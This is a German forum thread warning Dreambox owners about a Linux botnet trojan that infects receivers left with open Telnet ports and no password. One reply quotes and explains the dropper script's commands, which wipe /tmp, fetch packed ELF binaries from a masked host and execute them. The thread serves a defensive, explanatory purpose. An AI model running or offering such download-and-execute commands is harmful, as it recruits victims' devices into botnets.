Quantcast
Aktuelles
Von:
Digital Eliteboard - Das Digitale Technik Forum

Registriere dich noch heute kostenlos, um Mitglied zu werden! Sobald du angemeldet bist, kannst du auf unserer Seite aktiv teilnehmen, indem du deine eigenen Themen und Beiträge erstellst und dich über deinen eigenen Posteingang mit anderen Mitgliedern unterhalten kannst! Zudem bekommst du Zutritt zu Bereichen, welche für Gäste verwehrt bleiben

Registriere dich noch heute kostenlos, um Mitglied zu werden! Sobald du angemeldet bist, kannst du auf unserer Seite aktiv teilnehmen, indem du deine eigenen Themen und Beiträge erstellst und dich über deinen eigenen Posteingang mit anderen Mitgliedern unterhalten kannst! Zudem bekommst du Zutritt zu Bereichen, welche für Gäste verwehrt bleiben

Hardware & Software Linux Trojaner auf Dreambox

Zu beachten, wenn man Portweiterleitungen auf die Box setzt, um sie von außen zu erreichen:


hi,

mir ist vorgestern was auf der dreambox von user "Maly" aufgefallen, als ich ihm per Teamviewer
geholfen habe, er hatte port 21/23 (max 10min) auf. Und direkt nach dem neuflashen des Image hat es einen
Hintergrund Prozess mit wget gegeben, der ein script downloaded hat:

https://xxxxxxxxxx/w.sh



Das script downloaded diverse Sachen, welche am PC vom Antivirus Programm als LinuxTrojaner erkannt
wurden.

Wenn man nach der IP googled gibt es auch schon einen eintrag bei virustotal.org

Seid also vorsichtig, wenn ihr Ports öffnet und kein Passwort gesetzt habt, kann das übel ausgehen.
+++++++++++++++++++++
Quelle: NN Board
 
Zum Vergrößern anklicken....
AW: Linux Trojaner auf Dreambox

Ich habe mal daraufgeschaut und versuche die Funktionsweise zu erklären.

Zunächst wird das script "w.sh" ausgeführt und startet per wget den Download von 5 gepackten .elf Files (ausführbahren Dateien), von einem WebserverServer, für verschiedene Zielplattformen in den Ordner /tmp.

cd /tmp;rm -rf *;wget http://***/dskljn;cat dskljn >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://***/kjdnc;cat kjdnc >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://***/sdokdljn;cat sdokdljn >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://***/sdalk;cat sdalk >busybox;chmod 777 busybox;./busybox
cd /tmp;rm -rf *;wget http://***/akddx;cat akddx >busybox;chmod 777 busybox;./busybox
cd /tmp; busybox wget http://***/dskljn; chmod +x dskljn; ./dskljn; busybox rm -f dskljn*
cd /tmp; busybox wget http://***/kjdnc; chmod +x kjdnc; ./kjdnc; busybox rm -f kjdnc*
cd /tmp; busybox wget http://***/sdokdljn; chmod +x sdokdljn; ./sdokdljn; busybox rm -f sdokdljn*
cd /tmp; busybox wget http://***/sdalk; chmod +x sdalk; ./sdalk; busybox rm -f sdalk*
cd /tmp; busybox wget http:/***/akddx; chmod +x akddx; ./akddx; busybox rm -f akddx*
Zum Vergrößern anklicken....

Welche Zielarchtekturen "verwundbar sind", das sind kann man hier entnehmen:

Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013

File size Ratio Format Name
-------------------- ------ ----------- -----------
160635 <- 66048 41.12% netbsd/elf386 akddx
251127 <- 81936 32.63% linux/mipsel dskljn
251866 <- 82172 32.63% linux/mipseb kjdnc
151758 <- 65548 43.19% linux/armel sdalk
202326 <- 70712 34.95% linux/ElfAMD sdokdljn
-------------------- ------ ----------- -----------
1017712 <- 366416 36.00% [ 5 files ]
Zum Vergrößern anklicken....

Anschließend werden die unbekannten .ELF Dateien per chmod -x befehlt ausführbar gemacht und das script versucht diese alle zu starten (da die Zielarchitektur vorher nicht ermittelt wird, probiert man einfach durch).

Danach werden alle Dateien per busybox befehlt aus dem /tmp Verzeichnis gelöscht um die Spuren zu vernichten. Selbstverständlich läuft der eben gestartete Prozess im Hintergrund weiter!


Ich habe die .elf Datei nur kurz untersucht, auf Grund der Inhalte schließe ich jedoch auf einen Botcode, der per RPC gesteuert wird.
Sprich: Sobald das Programm läuft, wird die Box / PC zum Zombie, der per RPC darauf wartet diverse Angriffe, wie z.b. DDOS , von seinem C&C Rechner, der in Moldawien stationiert ist entgegenzunehmen. Auch eine Updatefunktion ist eingebaut die es dem Betreiber ermöglich neuen Schadcode nachzuladen.


 
Zuletzt bearbeitet:
AW: Linux Trojaner auf Dreambox

ist denn da raus um welche Images es sich handelt oder mit welchem Plugin das da rauf kommt?
Wird ja wohl nicht mit einem "original" Image kommen
 
AW: Linux Trojaner auf Dreambox

Das hat mit dem Image oder der Dreambox eigentlich garnichts zu tun.
Der Threadersteller sagte ja selber Telnet war offen, für den Infektionsweg bedeutet das einfach nur : Dummer Zufall!

Es gibt genug Botnetzte die 24 Stunden am Tag die IP Ranges der Welt nach offenen Ports abgrasen. Wird dann zufällig einer gefunden, wie in der Situation oben, führt der Angreifer automatisiert eienen login durch, welcher im Prinzip nur dieses script lädt und ausführt.

Es ist zusammengefasst ein völlig automatischer Prozess. Daher kann ich jedem, der einen Server, egal in welcher Form, betreibt nur wärmstens empfehlen, niemals irgendwelche passwortlosen logins zu verwenden, auch nicht für 10 Minuten. Das Ergbenis sieht man halt oben.
 
AW: Linux Trojaner auf Dreambox

Wobei es letztlich egal ist welches Image, das Problem ist der User der die Ports freigibt.
 

Ähnliche Themen

Drachentöter
  • Gesperrt
oscam-1.20_svn-r11734-aarch64-dreambox-linux-gnu-ssl-libusb-no_emu-streamrelay_patch_V24
2
Antworten
16
Aufrufe
3K
bizcode
bizcode
edgonzo
  • Artikel Artikel
HOT Gefahr lauert: Trojaner tarnt sich in vermeintlicher Bonus-Episode von House of the Dragon
Antworten
5
Aufrufe
777
Dunkler Saftanwender
Dunkler Saftanwender
edgonzo
  • Artikel Artikel
Hardware & Software Hacker-Linux behebt das Jahr-2038-Problem
Antworten
0
Aufrufe
1K
edgonzo
edgonzo
M
  • Gesperrt
oscam-2.24.07-11814@20030d14-arm-buildroot-linux-gnueabihf-libdvbcsa
Antworten
0
Aufrufe
256
mestorf
M
edgonzo
  • Artikel Artikel
Hardware & Software Linux für Anfänger: Welches Betriebssystem ist am besten?
Antworten
10
Aufrufe
5K
galusbonus
G
Zurück
Oben